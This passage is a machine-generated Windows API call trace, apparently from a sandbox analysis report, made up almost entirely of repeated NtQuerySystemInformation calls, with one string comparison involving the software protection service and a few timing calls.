(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x38, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x20, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x20, ResultLength=0x0) [0274.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x38, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x20, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.125] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb8, Length=0x50, ResultLength=0x0) [0274.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x38, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x28, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x38, ResultLength=0x0) [0274.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x28, ResultLength=0x0) [0274.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x28, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x38, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x38, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x20, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8f0, Length=0x20, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.132] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfdd50 | out: lpSystemTimeAsFileTime=0xc751dfdd50*(dwLowDateTime=0x4aa5a69, dwHighDateTime=0x1d5fb6f)) [0274.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdea0, Length=0x50, ResultLength=0x0) [0274.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdea0, Length=0x50, ResultLength=0x0) [0274.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdea0, Length=0x50, ResultLength=0x0) [0274.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddf0, Length=0x38, ResultLength=0x0) [0274.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x28, ResultLength=0x0) [0274.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc48, Length=0x50, ResultLength=0x0) [0274.134] GetTickCount () returned 0x1184d43 [0274.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb18, Length=0x58, ResultLength=0x0) [0274.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x38, ResultLength=0x0) [0274.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x28, ResultLength=0x0) [0274.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x28, ResultLength=0x0) [0274.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x28, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd860, Length=0x28, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8d0, Length=0x28, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x38, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd950, Length=0x28, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd950, Length=0x28, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x38, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x20, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x20, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x38, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8b0, Length=0x20, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x20, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x20, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb18, Length=0x58, ResultLength=0x0) [0274.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x28, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x28, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0274.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x28, ResultLength=0x0) [0274.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd790, Length=0x20, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x20, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x20, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd810, Length=0x20, ResultLength=0x0) [0274.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb18, Length=0x58, ResultLength=0x0) [0274.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x58, ResultLength=0x0) [0274.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x38, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.158] 